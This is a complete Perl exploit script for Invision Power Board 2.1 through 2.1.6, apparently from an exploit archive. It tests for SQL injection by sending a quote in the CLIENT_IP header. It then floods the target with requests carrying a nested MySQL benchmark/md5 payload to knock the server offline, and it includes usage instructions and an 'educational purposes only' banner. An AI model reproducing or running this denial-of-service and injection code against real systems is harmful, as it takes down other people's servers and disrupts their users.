Exploits

#!/usr/bin/perl
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
&header();
if (@ARGV < 2) {&info(); exit();}
$server = $ARGV[0];
$dir = $ARGV[1];
print "[+] SERVER {$server}\r\n";
print "[+] DIR {$dir}\r\n";
#Step 1, detecting vulnerability
print "[t] Testing forum vulnerability...";
$res = $ua->get("http://".$server.$dir."index.php?s=w00t",'USER_AGENT'=>'','CLIENT_IP'=>"'");
if($res->is_success)
   {
    if($res->as_string =~ /FROM (.*)sessions/) { print "forum vulnerable\r\n"; }
    else
       {
        print "forum unvulnerable\r\n";
        &footer();
        exit();
       }
}
else
   {
    print "something wrong :(\r\n";
    &footer();
    exit();
  }
#Step 2, prepare to DoS
print "[?] How many attempts? ";
$a = <STDIN>;
print "[?] Timeout between attempts in seconds? ";
$t = <STDIN>;
$q = "OR benchmark(1000,benchmark(3000,md5(current_time)))/*"; # calculation md5() 3 million times. You can increase or reduce this value
print "[i] Starting DoS. Please, be patient\r\n";
#Step 3. DoS
for ($i = 0; $i < $a; $i++)
   {
 $res = $ua->get("http://".$server.$dir."index.php?s=w00t",'USER_AGENT'=>'','CLIENT_IP'=>"' ".$q);
 sleep($t);
   }
print "[!] Victim server may be down\r\n";
&footer();
$ex = <STDIN>;
sub footer()
{
print "[G] Greets: 1dt.w0lf (rst/ghc)\r\n";
print "[L] Visit: secbun.info | rst.void.ru\r\n";
}
sub header()
{
print q(
--------
* Invision Power Board 2.1 <= 2.1.6 DoS Exploit          *
*       Based on r57-Advisory#41 by 1dt.w0lf (rst/ghc)   *
*                Coded by w4g.not null                   *
*              FOR EDUCATIONAL PURPOSES *ONLY*           *
--------
);
}
sub info()
{
print q(
[i] Usage: perl w4gipbdos216.pl [server] [/dir/]
    where
   |- server - server, where IPB installed without http://
   |- /dir/ - dir, where IPB installed or / for no dir
    e.g. perl w4gipbdos216.pl www.someserver.com /ipb/
 
[!] Working on all MySQL versions
[!] Need magic_quotes_gpc = Off
);
}